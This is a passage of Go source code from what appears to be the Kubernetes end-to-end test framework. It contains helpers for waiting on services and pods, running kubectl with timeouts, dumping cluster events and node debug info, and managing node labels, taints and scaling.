if err != nil {
return err
}
e := podsRunning(c, pods)
if len(e) > 0 {
return fmt.Errorf("failed to wait for pods running: %v", e)
}
if checkResponding {
err = PodsResponding(c, ns, name, wantName, pods)
if err != nil {
return fmt.Errorf("failed to wait for pods responding: %v", err)
}
}
return nil
}
func ServiceResponding(c clientset.Interface, ns, name string) error {
By(fmt.Sprintf("trying to dial the service %s.%s via the proxy", ns, name))
return wait.PollImmediate(Poll, ServiceRespondingTimeout, func() (done bool, err error) {
proxyRequest, errProxy := GetServicesProxyRequest(c, c.Core().RESTClient().Get())
if errProxy != nil {
Logf("Failed to get services proxy request: %v:", errProxy)
return false, nil
}
ctx, cancel := context.WithTimeout(context.Background(), SingleCallTimeout)
defer cancel()
body, err := proxyRequest.Namespace(ns).
Context(ctx).
Name(name).
Do().
Raw()
if err != nil {
if ctx.Err() != nil {
Failf("Failed to GET from service %s: %v", name, err)
return true, err
}
Logf("Failed to GET from service %s: %v:", name, err)
return false, nil
}
got := string(body)
if len(got) == 0 {
Logf("Service %s: expected non-empty response", name)
return false, nil // keep polling until the response is non-empty
}
Logf("Service %s: found nonempty answer: %s", name, got)
return true, nil
})
}
func RestclientConfig(kubeContext string) (*clientcmdapi.Config, error) {
Logf(">>> kubeConfig: %s", TestContext.KubeConfig)
if TestContext.KubeConfig == "" {
return nil, fmt.Errorf("KubeConfig must be specified to load client config")
}
c, err := clientcmd.LoadFromFile(TestContext.KubeConfig)
if err != nil {
return nil, fmt.Errorf("error loading KubeConfig: %v", err.Error())
}
if kubeContext != "" {
Logf(">>> kubeContext: %s", kubeContext)
c.CurrentContext = kubeContext
}
return c, nil
}
type ClientConfigGetter func() (*restclient.Config, error)
func LoadConfig() (*restclient.Config, error) {
if TestContext.NodeE2E {
// This is a node e2e test, apply the node e2e configuration
return &restclient.Config{Host: TestContext.Host}, nil
}
c, err := RestclientConfig(TestContext.KubeContext)
if err != nil {
if TestContext.KubeConfig == "" {
return restclient.InClusterConfig()
} else {
return nil, err
}
}
return clientcmd.NewDefaultClientConfig(*c, &clientcmd.ConfigOverrides{ClusterInfo: clientcmdapi.Cluster{Server: TestContext.Host}}).ClientConfig()
}
func LoadInternalClientset() (*internalclientset.Clientset, error) {
config, err := LoadConfig()
if err != nil {
return nil, fmt.Errorf("error creating client: %v", err.Error())
}
return internalclientset.NewForConfig(config)
}
func LoadClientset() (*clientset.Clientset, error) {
config, err := LoadConfig()
if err != nil {
return nil, fmt.Errorf("error creating client: %v", err.Error())
}
return clientset.NewForConfig(config)
}
// randomSuffix provides a random string to append to pods,services,rcs.
// TODO: Allow service names to have the same form as names
// for pods and replication controllers so we don't
// need to use such a function and can instead
// use the UUID utility function.
func randomSuffix() string {
r := rand.New(rand.NewSource(time.Now().UnixNano()))
return strconv.Itoa(r.Int() % 10000)
}
func ExpectNoError(err error, explain ...interface{}) {
if err != nil {
Logf("Unexpected error occurred: %v", err)
}
ExpectWithOffset(1, err).NotTo(HaveOccurred(), explain...)
}
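// ExpectNoErrorWithRetries retries fn up to maxRetries times before failing the test.
// Example (hypothetical lookup; assumes a configured clientset c):
//
//	ExpectNoErrorWithRetries(func() error {
//		_, err := c.Core().Services("default").Get("my-svc", metav1.GetOptions{})
//		return err
//	}, 3, "service should become visible")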
func ExpectNoErrorWithRetries(fn func() error, maxRetries int, explain ...interface{}) {
var err error
for i := 0; i < maxRetries; i++ {
err = fn()
if err == nil {
return
}
Logf("(Attempt %d of %d) Unexpected error occurred: %v", i+1, maxRetries, err)
}
ExpectWithOffset(1, err).NotTo(HaveOccurred(), explain...)
}
// Cleanup deletes everything created from filePath in namespace ns and checks that everything matching the selectors in that namespace is correctly stopped.
func Cleanup(filePath, ns string, selectors ...string) {
By("using delete to clean up resources")
var nsArg string
if ns != "" {
nsArg = fmt.Sprintf("--namespace=%s", ns)
}
RunKubectlOrDie("delete", "--grace-period=0", "-f", filePath, nsArg)
AssertCleanup(ns, selectors...)
}
// AssertCleanup asserts that cleanup of the namespace with respect to the given selectors occurred.
func AssertCleanup(ns string, selectors ...string) {
var nsArg string
if ns != "" {
nsArg = fmt.Sprintf("--namespace=%s", ns)
}
for _, selector := range selectors {
resources := RunKubectlOrDie("get", "rc,svc", "-l", selector, "--no-headers", nsArg)
if resources != "" {
Failf("Resources left running after stop:\n%s", resources)
}
pods := RunKubectlOrDie("get", "pods", "-l", selector, nsArg, "-o", "go-template={{ range .items }}{{ if not .metadata.deletionTimestamp }}{{ .metadata.name }}{{ \"\\n\" }}{{ end }}{{ end }}")
if pods != "" {
Failf("Pods left unterminated after stop:\n%s", pods)
}
}
}
// validatorFn is the function which individual tests will implement.
// We may want it to return more than just an error, at some point.
type validatorFn func(c clientset.Interface, podID string) error
// ValidateController is a generic mechanism for testing RC's that are running.
// It takes a container name, a test name, and a validator function which is plugged in by a specific test.
// "containername": this is grepped for.
// "containerImage" : this is the name of the image we expect to be launched. Not to confuse w/ images (kitten.jpg) which are validated.
// "testname": which gets bubbled up to the logging/failure messages if errors happen.
// "validator" function: This function is given a podID and a client, and it can do some specific validations that way.
func ValidateController(c clientset.Interface, containerImage string, replicas int, containername string, testname string, validator validatorFn, ns string) {
getPodsTemplate := "--template={{range.items}}{{.metadata.name}} {{end}}"
// NB: kubectl adds the "exists" function to the standard template functions.
// This lets us check to see if the "running" entry exists for each of the containers
// we care about. Exists will never return an error and it's safe to check a chain of
// things, any one of which may not exist. In the below template, all of info,
// containername, and running might be nil, so the normal index function isn't very
// helpful.
// This template is unit-tested in kubectl, so if you change it, update the unit test.
// You can read about the syntax here: http://golang.org/pkg/text/template/.
getContainerStateTemplate := fmt.Sprintf(`--template={{if (exists . "status" "containerStatuses")}}{{range .status.containerStatuses}}{{if (and (eq .name "%s") (exists . "state" "running"))}}true{{end}}{{end}}{{end}}`, containername)
getImageTemplate := fmt.Sprintf(`--template={{if (exists . "status" "containerStatuses")}}{{range .status.containerStatuses}}{{if eq .name "%s"}}{{.image}}{{end}}{{end}}{{end}}`, containername)
By(fmt.Sprintf("waiting for all containers in %s pods to come up.", testname)) //testname should be selector
waitLoop:
for start := time.Now(); time.Since(start) < PodStartTimeout; time.Sleep(5 * time.Second) {
getPodsOutput := RunKubectlOrDie("get", "pods", "-o", "template", getPodsTemplate, "-l", testname, fmt.Sprintf("--namespace=%v", ns))
pods := strings.Fields(getPodsOutput)
if numPods := len(pods); numPods != replicas {
By(fmt.Sprintf("Replicas for %s: expected=%d actual=%d", testname, replicas, numPods))
continue
}
var runningPods []string
for _, podID := range pods {
running := RunKubectlOrDie("get", "pods", podID, "-o", "template", getContainerStateTemplate, fmt.Sprintf("--namespace=%v", ns))
if running != "true" {
Logf("%s is created but not running", podID)
continue waitLoop
}
currentImage := RunKubectlOrDie("get", "pods", podID, "-o", "template", getImageTemplate, fmt.Sprintf("--namespace=%v", ns))
if currentImage != containerImage {
Logf("%s is created but running wrong image; expected: %s, actual: %s", podID, containerImage, currentImage)
continue waitLoop
}
// Call the generic validator function here.
// This might validate for example, that (1) getting a url works and (2) url is serving correct content.
if err := validator(c, podID); err != nil {
Logf("%s is running right image but validator function failed: %v", podID, err)
continue waitLoop
}
Logf("%s is verified up and running", podID)
runningPods = append(runningPods, podID)
}
// If we reach here, then all our checks passed.
if len(runningPods) == replicas {
return
}
}
// Reaching here means that one or more checks failed multiple times. Assuming it's not a race condition, something is broken.
Failf("Timed out after %v seconds waiting for %s pods to reach valid state", PodStartTimeout.Seconds(), testname)
}
// KubectlCmd runs the kubectl executable through the wrapper script.
func KubectlCmd(args ...string) *exec.Cmd {
defaultArgs := []string{}
// Reference a --server option so tests can run anywhere.
if TestContext.Host != "" {
defaultArgs = append(defaultArgs, "--"+clientcmd.FlagAPIServer+"="+TestContext.Host)
}
if TestContext.KubeConfig != "" {
defaultArgs = append(defaultArgs, "--"+clientcmd.RecommendedConfigPathFlag+"="+TestContext.KubeConfig)
// Reference the KubeContext
if TestContext.KubeContext != "" {
defaultArgs = append(defaultArgs, "--"+clientcmd.FlagContext+"="+TestContext.KubeContext)
}
} else {
if TestContext.CertDir != "" {
defaultArgs = append(defaultArgs,
fmt.Sprintf("--certificate-authority=%s", filepath.Join(TestContext.CertDir, "ca.crt")),
fmt.Sprintf("--client-certificate=%s", filepath.Join(TestContext.CertDir, "kubecfg.crt")),
fmt.Sprintf("--client-key=%s", filepath.Join(TestContext.CertDir, "kubecfg.key")))
}
}
kubectlArgs := append(defaultArgs, args...)
// We allow users to specify a path to kubectl, so you can test either "kubectl" or "cluster/kubectl.sh"
// and so on.
cmd := exec.Command(TestContext.KubectlPath, kubectlArgs...)
// The caller will invoke this and wait on it.
return cmd
}
// kubectlBuilder is used to build, customize and execute a kubectl Command.
// Add more functions to customize the builder as needed.
type kubectlBuilder struct {
cmd *exec.Cmd
timeout <-chan time.Time
}
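// Example of chaining the builder (hypothetical arguments):
//
//	out := NewKubectlCommand("get", "pods", "--namespace=default").
//		WithTimeout(time.After(30 * time.Second)).
//		ExecOrDie()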
func NewKubectlCommand(args ...string) *kubectlBuilder {
b := new(kubectlBuilder)
b.cmd = KubectlCmd(args...)
return b
}
func (b *kubectlBuilder) WithEnv(env []string) *kubectlBuilder {
b.cmd.Env = env
return b
}
func (b *kubectlBuilder) WithTimeout(t <-chan time.Time) *kubectlBuilder {
b.timeout = t
return b
}
func (b kubectlBuilder) WithStdinData(data string) *kubectlBuilder {
b.cmd.Stdin = strings.NewReader(data)
return &b
}
func (b kubectlBuilder) WithStdinReader(reader io.Reader) *kubectlBuilder {
b.cmd.Stdin = reader
return &b
}
func (b kubectlBuilder) ExecOrDie() string {
str, err := b.Exec()
Logf("stdout: %q", str)
// In case of i/o timeout error, try talking to the apiserver again after 2s before dying.
// Note that we're still dying after retrying so that we can get visibility to triage it further.
if isTimeout(err) {
Logf("Hit i/o timeout error, talking to the server 2s later to see if it's temporary.")
time.Sleep(2 * time.Second)
retryStr, retryErr := RunKubectl("version")
Logf("stdout: %q", retryStr)
Logf("err: %v", retryErr)
}
Expect(err).NotTo(HaveOccurred())
return str
}
func isTimeout(err error) bool {
switch err := err.(type) {
case net.Error:
if err.Timeout() {
return true
}
case *url.Error:
if err, ok := err.Err.(net.Error); ok && err.Timeout() {
return true
}
}
return false
}
func (b kubectlBuilder) Exec() (string, error) {
var stdout, stderr bytes.Buffer
cmd := b.cmd
cmd.Stdout, cmd.Stderr = &stdout, &stderr
Logf("Running '%s %s'", cmd.Path, strings.Join(cmd.Args[1:], " ")) // skip arg[0] as it is printed separately
if err := cmd.Start(); err != nil {
return "", fmt.Errorf("error starting %v:\nCommand stdout:\n%v\nstderr:\n%v\nerror:\n%v\n", cmd, cmd.Stdout, cmd.Stderr, err)
}
errCh := make(chan error, 1)
go func() {
errCh <- cmd.Wait()
}()
select {
case err := <-errCh:
if err != nil {
var rc int = 127
if ee, ok := err.(*exec.ExitError); ok {
// Extract the real exit code before logging it; otherwise we would always log the default 127.
rc = int(ee.Sys().(syscall.WaitStatus).ExitStatus())
Logf("rc: %d", rc)
}
return "", uexec.CodeExitError{
Err: fmt.Errorf("error running %v:\nCommand stdout:\n%v\nstderr:\n%v\nerror:\n%v\n", cmd, cmd.Stdout, cmd.Stderr, err),
Code: rc,
}
}
case <-b.timeout:
b.cmd.Process.Kill()
return "", fmt.Errorf("timed out waiting for command %v:\nCommand stdout:\n%v\nstderr:\n%v\n", cmd, cmd.Stdout, cmd.Stderr)
}
Logf("stderr: %q", stderr.String())
return stdout.String(), nil
}
// RunKubectlOrDie is a convenience wrapper over kubectlBuilder
func RunKubectlOrDie(args ...string) string {
return NewKubectlCommand(args...).ExecOrDie()
}
// RunKubectl is a convenience wrapper over kubectlBuilder
func RunKubectl(args ...string) (string, error) {
return NewKubectlCommand(args...).Exec()
}
// RunKubectlOrDieInput is a convenience wrapper over kubectlBuilder that takes input to stdin
func RunKubectlOrDieInput(data string, args ...string) string {
return NewKubectlCommand(args...).WithStdinData(data).ExecOrDie()
}
func StartCmdAndStreamOutput(cmd *exec.Cmd) (stdout, stderr io.ReadCloser, err error) {
stdout, err = cmd.StdoutPipe()
if err != nil {
return
}
stderr, err = cmd.StderrPipe()
if err != nil {
return
}
Logf("Asynchronously running '%s %s'", cmd.Path, strings.Join(cmd.Args, " "))
err = cmd.Start()
return
}
// Rough equivalent of ctrl+c for cleaning up processes. Intended to be run in defer.
func TryKill(cmd *exec.Cmd) {
if err := cmd.Process.Kill(); err != nil {
Logf("ERROR failed to kill command %v! The process may leak", cmd)
}
}
// testContainerOutputMatcher runs the given pod in the given namespace and waits
// for all of the containers in the podSpec to move into the 'Success' status, and tests
// the specified container log against the given expected output using the given matcher.
func (f *Framework) testContainerOutputMatcher(scenarioName string,
pod *v1.Pod,
containerIndex int,
expectedOutput []string,
matcher func(string, ...interface{}) gomegatypes.GomegaMatcher) {
By(fmt.Sprintf("Creating a pod to test %v", scenarioName))
if containerIndex < 0 || containerIndex >= len(pod.Spec.Containers) {
Failf("Invalid container index: %d", containerIndex)
}
ExpectNoError(f.MatchContainerOutput(pod, pod.Spec.Containers[containerIndex].Name, expectedOutput, matcher))
}
// MatchContainerOutput creates a pod and waits for all of its containers to exit with success.
// It then tests that the matcher with each expectedOutput matches the output of the specified container.
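// Example (hypothetical pod and container name; assumes ContainSubstring is the
// dot-imported gomega matcher):
//
//	err := f.MatchContainerOutput(pod, "main", []string{"hello"}, ContainSubstring)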
func (f *Framework) MatchContainerOutput(
pod *v1.Pod,
containerName string,
expectedOutput []string,
matcher func(string, ...interface{}) gomegatypes.GomegaMatcher) error {
ns := pod.ObjectMeta.Namespace
if ns == "" {
ns = f.Namespace.Name
}
podClient := f.PodClientNS(ns)
createdPod := podClient.Create(pod)
defer func() {
By("delete the pod")
podClient.DeleteSync(createdPod.Name, &metav1.DeleteOptions{}, DefaultPodDeletionTimeout)
}()
// Wait for client pod to complete.
podErr := WaitForPodSuccessInNamespace(f.ClientSet, createdPod.Name, ns)
// Grab its logs. Get host first.
podStatus, err := podClient.Get(createdPod.Name, metav1.GetOptions{})
if err != nil {
return fmt.Errorf("failed to get pod status: %v", err)
}
if podErr != nil {
// Pod failed. Dump all logs from all containers to see what's wrong
for _, container := range podStatus.Spec.Containers {
logs, err := GetPodLogs(f.ClientSet, ns, podStatus.Name, container.Name)
if err != nil {
Logf("Failed to get logs from node %q pod %q container %q: %v",
podStatus.Spec.NodeName, podStatus.Name, container.Name, err)
continue
}
Logf("Output of node %q pod %q container %q: %s", podStatus.Spec.NodeName, podStatus.Name, container.Name, logs)
}
return fmt.Errorf("expected pod %q success: %v", createdPod.Name, podErr)
}
Logf("Trying to get logs from node %s pod %s container %s: %v",
podStatus.Spec.NodeName, podStatus.Name, containerName, err)
// Sometimes the actual containers take a second to get started, try to get logs for 60s
logs, err := GetPodLogs(f.ClientSet, ns, podStatus.Name, containerName)
if err != nil {
Logf("Failed to get logs from node %q pod %q container %q. %v",
podStatus.Spec.NodeName, podStatus.Name, containerName, err)
return fmt.Errorf("failed to get logs from %s for %s: %v", podStatus.Name, containerName, err)
}
for _, expected := range expectedOutput {
m := matcher(expected)
matches, err := m.Match(logs)
if err != nil {
return fmt.Errorf("expected %q in container output: %v", expected, err)
} else if !matches {
return fmt.Errorf("expected %q in container output: %s", expected, m.FailureMessage(logs))
}
}
return nil
}
func RunDeployment(config testutils.DeploymentConfig) error {
By(fmt.Sprintf("creating deployment %s in namespace %s", config.Name, config.Namespace))
config.NodeDumpFunc = DumpNodeDebugInfo
config.ContainerDumpFunc = LogFailedContainers
return testutils.RunDeployment(config)
}
func RunReplicaSet(config testutils.ReplicaSetConfig) error {
By(fmt.Sprintf("creating replicaset %s in namespace %s", config.Name, config.Namespace))
config.NodeDumpFunc = DumpNodeDebugInfo
config.ContainerDumpFunc = LogFailedContainers
return testutils.RunReplicaSet(config)
}
func RunRC(config testutils.RCConfig) error {
By(fmt.Sprintf("creating replication controller %s in namespace %s", config.Name, config.Namespace))
config.NodeDumpFunc = DumpNodeDebugInfo
config.ContainerDumpFunc = LogFailedContainers
return testutils.RunRC(config)
}
type EventsLister func(opts metav1.ListOptions, ns string) (*v1.EventList, error)
func DumpEventsInNamespace(eventsLister EventsLister, namespace string) {
By(fmt.Sprintf("Collecting events from namespace %q.", namespace))
events, err := eventsLister(metav1.ListOptions{}, namespace)
Expect(err).NotTo(HaveOccurred())
By(fmt.Sprintf("Found %d events.", len(events.Items)))
// Sort events by their first timestamp
sortedEvents := events.Items
if len(sortedEvents) > 1 {
sort.Sort(byFirstTimestamp(sortedEvents))
}
for _, e := range sortedEvents {
Logf("At %v - event for %v: %v %v: %v", e.FirstTimestamp, e.InvolvedObject.Name, e.Source, e.Reason, e.Message)
}
// Note that we don't wait for any Cleanup to propagate, which means
// that if you delete a bunch of pods right before ending your test,
// you may or may not see the killing/deletion/Cleanup events.
}
func DumpAllNamespaceInfo(c clientset.Interface, namespace string) {
DumpEventsInNamespace(func(opts metav1.ListOptions, ns string) (*v1.EventList, error) {
return c.Core().Events(ns).List(opts)
}, namespace)
// If cluster is large, then the following logs are basically useless, because:
// 1. it takes tens of minutes or hours to grab all of them
// 2. there are so many of them that working with them is mostly impossible
// So we dump them only if the cluster is relatively small.
maxNodesForDump := 20
if nodes, err := c.Core().Nodes().List(metav1.ListOptions{}); err == nil {
if len(nodes.Items) <= maxNodesForDump {
dumpAllPodInfo(c)
dumpAllNodeInfo(c)
} else {
Logf("skipping dumping cluster info - cluster too large")
}
} else {
Logf("unable to fetch node list: %v", err)
}
}
// byFirstTimestamp sorts a slice of events by first timestamp, using their involvedObject's name as a tie breaker.
type byFirstTimestamp []v1.Event
func (o byFirstTimestamp) Len() int { return len(o) }
func (o byFirstTimestamp) Swap(i, j int) { o[i], o[j] = o[j], o[i] }
func (o byFirstTimestamp) Less(i, j int) bool {
if o[i].FirstTimestamp.Equal(o[j].FirstTimestamp) {
return o[i].InvolvedObject.Name < o[j].InvolvedObject.Name
}
return o[i].FirstTimestamp.Before(o[j].FirstTimestamp)
}
func dumpAllPodInfo(c clientset.Interface) {
pods, err := c.Core().Pods("").List(metav1.ListOptions{})
if err != nil {
Logf("unable to fetch pod debug info: %v", err)
}
logPodStates(pods.Items)
}
func dumpAllNodeInfo(c clientset.Interface) {
// It should be OK to list unschedulable Nodes here.
nodes, err := c.Core().Nodes().List(metav1.ListOptions{})
if err != nil {
Logf("unable to fetch node list: %v", err)
return
}
names := make([]string, len(nodes.Items))
for ix := range nodes.Items {
names[ix] = nodes.Items[ix].Name
}
DumpNodeDebugInfo(c, names, Logf)
}
func DumpNodeDebugInfo(c clientset.Interface, nodeNames []string, logFunc func(fmt string, args ...interface{})) {
for _, n := range nodeNames {
logFunc("\nLogging node info for node %v", n)
node, err := c.Core().Nodes().Get(n, metav1.GetOptions{})
if err != nil {
logFunc("Error getting node info %v", err)
}
logFunc("Node Info: %v", node)
logFunc("\nLogging kubelet events for node %v", n)
for _, e := range getNodeEvents(c, n) {
logFunc("source %v type %v message %v reason %v first ts %v last ts %v, involved obj %+v",
e.Source, e.Type, e.Message, e.Reason, e.FirstTimestamp, e.LastTimestamp, e.InvolvedObject)
}
logFunc("\nLogging pods the kubelet thinks is on node %v", n)
podList, err := GetKubeletPods(c, n)
if err != nil {
logFunc("Unable to retrieve kubelet pods for node %v", n)
continue
}
for _, p := range podList.Items {
logFunc("%v started at %v (%d+%d container statuses recorded)", p.Name, p.Status.StartTime, len(p.Status.InitContainerStatuses), len(p.Status.ContainerStatuses))
for _, c := range p.Status.InitContainerStatuses {
logFunc("\tInit container %v ready: %v, restart count %v",
c.Name, c.Ready, c.RestartCount)
}
for _, c := range p.Status.ContainerStatuses {
logFunc("\tContainer %v ready: %v, restart count %v",
c.Name, c.Ready, c.RestartCount)
}
}
HighLatencyKubeletOperations(c, 10*time.Second, n, logFunc)
// TODO: Log node resource info
}
}
// getNodeEvents returns kubelet events from the given node. This includes kubelet
// restart and node unhealthy events. Note that listing events like this will mess
// with latency metrics, beware of calling it during a test.
func getNodeEvents(c clientset.Interface, nodeName string) []v1.Event {
selector := fields.Set{
"involvedObject.kind": "Node",
"involvedObject.name": nodeName,
"involvedObject.namespace": metav1.NamespaceAll,
"source": "kubelet",
}.AsSelector().String()
options := metav1.ListOptions{FieldSelector: selector}
events, err := c.Core().Events(metav1.NamespaceSystem).List(options)
if err != nil {
Logf("Unexpected error retrieving node events %v", err)
return []v1.Event{}
}
return events.Items
}
// waitListSchedulableNodesOrDie is a wrapper around listing nodes supporting retries.
func waitListSchedulableNodesOrDie(c clientset.Interface) *v1.NodeList {
var nodes *v1.NodeList
var err error
if wait.PollImmediate(Poll, SingleCallTimeout, func() (bool, error) {
nodes, err = c.Core().Nodes().List(metav1.ListOptions{FieldSelector: fields.Set{
"spec.unschedulable": "false",
}.AsSelector().String()})
return err == nil, nil
}) != nil {
ExpectNoError(err, "Timed out while listing nodes for e2e cluster.")
}
return nodes
}
// Node is schedulable if:
// 1) doesn't have "unschedulable" field set
// 2) its Ready condition is set to true
// 3) doesn't have NetworkUnavailable condition set to true
func isNodeSchedulable(node *v1.Node) bool {
nodeReady := IsNodeConditionSetAsExpected(node, v1.NodeReady, true)
networkReady := IsNodeConditionUnset(node, v1.NodeNetworkUnavailable) ||
IsNodeConditionSetAsExpectedSilent(node, v1.NodeNetworkUnavailable, false)
return !node.Spec.Unschedulable && nodeReady && networkReady
}
// Test whether a fake pod can be scheduled on "node", given its current taints.
func isNodeUntainted(node *v1.Node) bool {
fakePod := &v1.Pod{
TypeMeta: metav1.TypeMeta{
Kind: "Pod",
APIVersion: api.Registry.GroupOrDie(v1.GroupName).GroupVersion.String(),
},
ObjectMeta: metav1.ObjectMeta{
Name: "fake-not-scheduled",
Namespace: "fake-not-scheduled",
},
Spec: v1.PodSpec{
Containers: []v1.Container{
{
Name: "fake-not-scheduled",
Image: "fake-not-scheduled",
},
},
},
}
nodeInfo := schedulercache.NewNodeInfo()
nodeInfo.SetNode(node)
fit, _, err := predicates.PodToleratesNodeTaints(fakePod, nil, nodeInfo)
if err != nil {
Failf("Can't test predicates for node %s: %v", node.Name, err)
return false
}
return fit
}
// GetReadySchedulableNodesOrDie addresses the common use case of getting nodes you can do work on.
// 1) Needs to be schedulable.
// 2) Needs to be ready.
// If EITHER 1 or 2 is not true, most tests will want to ignore the node entirely.
func GetReadySchedulableNodesOrDie(c clientset.Interface) (nodes *v1.NodeList) {
nodes = waitListSchedulableNodesOrDie(c)
// Previous tests may have caused failures of some nodes. Let's skip
// 'Not Ready' nodes, just in case (there is no need to fail the test).
FilterNodes(nodes, func(node v1.Node) bool {
return isNodeSchedulable(&node) && isNodeUntainted(&node)
})
return nodes
}
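// WaitForAllNodesSchedulable polls every 30 seconds until all but
// TestContext.AllowedNotReadyNodes nodes are schedulable, or the timeout expires.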
func WaitForAllNodesSchedulable(c clientset.Interface, timeout time.Duration) error {
Logf("Waiting up to %v for all (but %d) nodes to be schedulable", timeout, TestContext.AllowedNotReadyNodes)
var notSchedulable []*v1.Node
attempt := 0
return wait.PollImmediate(30*time.Second, timeout, func() (bool, error) {
attempt++
notSchedulable = nil
opts := metav1.ListOptions{
ResourceVersion: "0",
FieldSelector: fields.Set{"spec.unschedulable": "false"}.AsSelector().String(),
}
nodes, err := c.Core().Nodes().List(opts)
if err != nil {
Logf("Unexpected error listing nodes: %v", err)
// Ignore the error here - it will be retried.
return false, nil
}
for i := range nodes.Items {
node := &nodes.Items[i]
if !isNodeSchedulable(node) {
notSchedulable = append(notSchedulable, node)
}
}
// Framework allows for <TestContext.AllowedNotReadyNodes> nodes to be non-ready,
// to make it possible e.g. for incorrect deployment of some small percentage
// of nodes (which we allow in cluster validation). Some nodes that are not
// provisioned correctly at startup will never become ready (e.g. when something
// won't install correctly), so we can't expect them to be ready at any point.
//
// However, we only allow non-ready nodes with some specific reasons.
if len(notSchedulable) > 0 {
// In large clusters, log them only every 10th pass.
if len(nodes.Items) >= largeClusterThreshold && attempt%10 == 0 {
Logf("Unschedulable nodes:")
for i := range notSchedulable {
Logf("-> %s Ready=%t Network=%t",
notSchedulable[i].Name,
IsNodeConditionSetAsExpectedSilent(notSchedulable[i], v1.NodeReady, true),
IsNodeConditionSetAsExpectedSilent(notSchedulable[i], v1.NodeNetworkUnavailable, false))
}
Logf("================================")
}
}
if len(notSchedulable) > TestContext.AllowedNotReadyNodes {
return false, nil
}
return allowedNotReadyReasons(notSchedulable), nil
})
}
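// GetTTLAnnotationFromNode returns the node's TTL annotation as a duration,
// and whether a valid annotation was present.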
func GetTTLAnnotationFromNode(node *v1.Node) (time.Duration, bool) {
if node.Annotations == nil {
return time.Duration(0), false
}
value, ok := node.Annotations[v1.ObjectTTLAnnotationKey]
if !ok {
return time.Duration(0), false
}
intValue, err := strconv.Atoi(value)
if err != nil {
Logf("Cannot convert TTL annotation from %#v to int", *node)
return time.Duration(0), false
}
return time.Duration(intValue) * time.Second, true
}
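// AddOrUpdateLabelOnNode applies the given label to the node, failing the test on error.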
func AddOrUpdateLabelOnNode(c clientset.Interface, nodeName string, labelKey, labelValue string) {
ExpectNoError(testutils.AddLabelsToNode(c, nodeName, map[string]string{labelKey: labelValue}))
}
func ExpectNodeHasLabel(c clientset.Interface, nodeName string, labelKey string, labelValue string) {
By("verifying the node has the label " + labelKey + " " + labelValue)
node, err := c.Core().Nodes().Get(nodeName, metav1.GetOptions{})
ExpectNoError(err)
Expect(node.Labels[labelKey]).To(Equal(labelValue))
}
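// RemoveTaintOffNode removes the given taint from the node and verifies that it is gone.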
func RemoveTaintOffNode(c clientset.Interface, nodeName string, taint v1.Taint) {
ExpectNoError(controller.RemoveTaintOffNode(c, nodeName, &taint, nil))
VerifyThatTaintIsGone(c, nodeName, &taint)
}
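// AddOrUpdateTaintOnNode applies the given taint to the node, failing the test on error.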
func AddOrUpdateTaintOnNode(c clientset.Interface, nodeName string, taint v1.Taint) {
ExpectNoError(controller.AddOrUpdateTaintOnNode(c, nodeName, &taint))
}
// RemoveLabelOffNode cleans up labels temporarily added to a node; it
// won't fail if the target label doesn't exist or has already been removed.
func RemoveLabelOffNode(c clientset.Interface, nodeName string, labelKey string) {
By("removing the label " + labelKey + " off the node " + nodeName)
ExpectNoError(testutils.RemoveLabelOffNode(c, nodeName, []string{labelKey}))
By("verifying the node doesn't have the label " + labelKey)
ExpectNoError(testutils.VerifyLabelsRemoved(c, nodeName, []string{labelKey}))
}
func VerifyThatTaintIsGone(c clientset.Interface, nodeName string, taint *v1.Taint) {
By("verifying the node doesn't have the taint " + taint.ToString())
nodeUpdated, err := c.Core().Nodes().Get(nodeName, metav1.GetOptions{})
ExpectNoError(err)
if v1helper.TaintExists(nodeUpdated.Spec.Taints, taint) {
Failf("Failed removing taint " + taint.ToString() + " of the node " + nodeName)
}
}
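// ExpectNodeHasTaint fails the test if the node does not carry the given taint.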
func ExpectNodeHasTaint(c clientset.Interface, nodeName string, taint *v1.Taint) {
By("verifying the node has the taint " + taint.ToString())
if has, err := NodeHasTaint(c, nodeName, taint); !has {
ExpectNoError(err)
Failf("Failed to find taint %s on node %s", taint.ToString(), nodeName)
}
}
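// NodeHasTaint returns whether the node currently carries the given taint.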
func NodeHasTaint(c clientset.Interface, nodeName string, taint *v1.Taint) (bool, error) {
node, err := c.Core().Nodes().Get(nodeName, metav1.GetOptions{})
if err != nil {
return false, err
}
nodeTaints := node.Spec.Taints
if len(nodeTaints) == 0 || !v1helper.TaintExists(nodeTaints, taint) {
return false, nil
}
return true, nil
}
// AddOrUpdateAvoidPodOnNode adds the avoidPods annotation to the node, overriding any existing value.
func AddOrUpdateAvoidPodOnNode(c clientset.Interface, nodeName string, avoidPods v1.AvoidPods) {
err := wait.PollImmediate(Poll, SingleCallTimeout, func() (bool, error) {
node, err := c.CoreV1().Nodes().Get(nodeName, metav1.GetOptions{})
ExpectNoError(err)
avoidPodsData, err := json.Marshal(avoidPods)
ExpectNoError(err)
if node.Annotations == nil {
node.Annotations = make(map[string]string)
}
node.Annotations[v1.PreferAvoidPodsAnnotationKey] = string(avoidPodsData)
_, err = c.CoreV1().Nodes().Update(node)
if err != nil {
if !apierrs.IsConflict(err) {
ExpectNoError(err)
} else {
Logf("Conflict when trying to add/update avoidPonds %v to %v", avoidPods, nodeName)
}
}
return true, nil
})
ExpectNoError(err)
}
// RemoveAvoidPodsOffNode removes the avoidPods annotation from the node. It does not fail if no such annotation exists.
func RemoveAvoidPodsOffNode(c clientset.Interface, nodeName string) {
err := wait.PollImmediate(Poll, SingleCallTimeout, func() (bool, error) {
node, err := c.CoreV1().Nodes().Get(nodeName, metav1.GetOptions{})
ExpectNoError(err)
if node.Annotations == nil {
return true, nil
}
delete(node.Annotations, v1.PreferAvoidPodsAnnotationKey)
_, err = c.CoreV1().Nodes().Update(node)
if err != nil {
if !apierrs.IsConflict(err) {
ExpectNoError(err)
} else {
Logf("Conflict when trying to remove avoidPods to %v", nodeName)
}
}
return true, nil
})
ExpectNoError(err)
}
func getScalerForKind(internalClientset internalclientset.Interface, kind schema.GroupKind) (kubectl.Scaler, error) {
return kubectl.ScalerFor(kind, internalClientset)
}
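// ScaleResource scales the named resource of the given kind to size replicas
// and, if wait is true, waits for the controlled pods to be running.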
func ScaleResource(
clientset clientset.Interface,
internalClientset internalclientset.Interface,
ns, name string,
size uint,
wait bool,
kind schema.GroupKind,
) error {
By(fmt.Sprintf("Scaling %v %s in namespace %s to %d", kind, name, ns, size))
scaler, err := getScalerForKind(internalClientset, kind)
if err != nil {
return err
}
waitForScale := kubectl.NewRetryParams(5*time.Second, 1*time.Minute)
waitForReplicas := kubectl.NewRetryParams(5*time.Second, 5*time.Minute)
if err = scaler.Scale(ns, name, size, nil, waitForScale, waitForReplicas); err != nil {
